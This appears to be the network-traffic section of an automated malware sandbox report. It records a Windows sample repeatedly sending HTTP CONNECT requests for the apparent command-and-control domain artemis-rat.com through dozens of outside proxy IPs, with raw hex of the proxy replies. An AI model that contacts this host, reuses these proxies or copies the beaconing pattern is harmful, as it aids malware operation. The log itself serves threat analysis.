                                              793192.168.2.450048213.202.230.241807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.466684103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.895853996 CET536INHTTP/1.1 502 Proxy Error
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Server: Apache/2.4.52 (Ubuntu)
                                              Content-Length: 551
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: artemis-rat.com</strong></p></p><p>Additionally, a 50
                                              Mar 11, 2024 08:37:20.895860910 CET197INData Raw: 32 20 42 61 64 20 47 61 74 65 77 61 79 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65
                                              Data Ascii: 2 Bad Gatewayerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              794192.168.2.45249965.21.24.81807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.467428923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.941953897 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.25.3
                                              Date: Mon, 11 Mar 2024 07:36:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              795192.168.2.450932206.220.175.241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.478939056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              796192.168.2.45256474.48.7.43807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.478944063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              797192.168.2.452554103.118.46.17780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.498593092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              798192.168.2.45168845.188.164.4819947284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.504523039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.553950071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.554882050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569668055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              799192.168.2.450228192.169.226.96505787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.504710913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.554065943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.554946899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569683075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              800192.168.2.45255723.137.248.19788887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.513844013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              801192.168.2.45160298.162.25.2341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.522988081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              802192.168.2.45168098.170.57.24941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.525518894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              803192.168.2.45009247.91.65.2331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.525677919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.429003954 CET38INHTTP/1.1 200 OK
                                              content-length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              804192.168.2.450243162.240.239.103427717284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.535497904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.606338024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.660417080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.705848932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.708441019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.709927082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:08.834956884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:32.928702116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              805192.168.2.452559113.143.37.8290027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.545653105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              806192.168.2.450203162.241.46.40615797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.548264980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.606471062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.660407066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.705825090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.708471060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.711726904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              807192.168.2.451758162.240.79.167565367284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.549215078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.554065943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.554986954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569668055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.569410086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              808192.168.2.45256045.138.87.23810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.550362110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              809192.168.2.452569184.185.2.1241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.556627989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              810192.168.2.45256772.206.181.97649437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.620587111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              811192.168.2.452561103.127.1.130807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.621503115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              812192.168.2.452568121.182.138.71807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.627130985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              813192.168.2.450055201.243.82.15731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.641124964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.741331100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.843718052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.848798990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:28.682888985 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              814192.168.2.452562103.190.54.14180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.648353100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.473973989 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              815192.168.2.450234103.133.27.14380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.650325060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.255135059 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              816192.168.2.450231121.204.179.7077777284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.658838987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.663461924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.240597010 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              817192.168.2.452566216.9.224.113807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.662010908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              818192.168.2.452247117.160.250.134807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.665484905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.366539955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.242162943 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
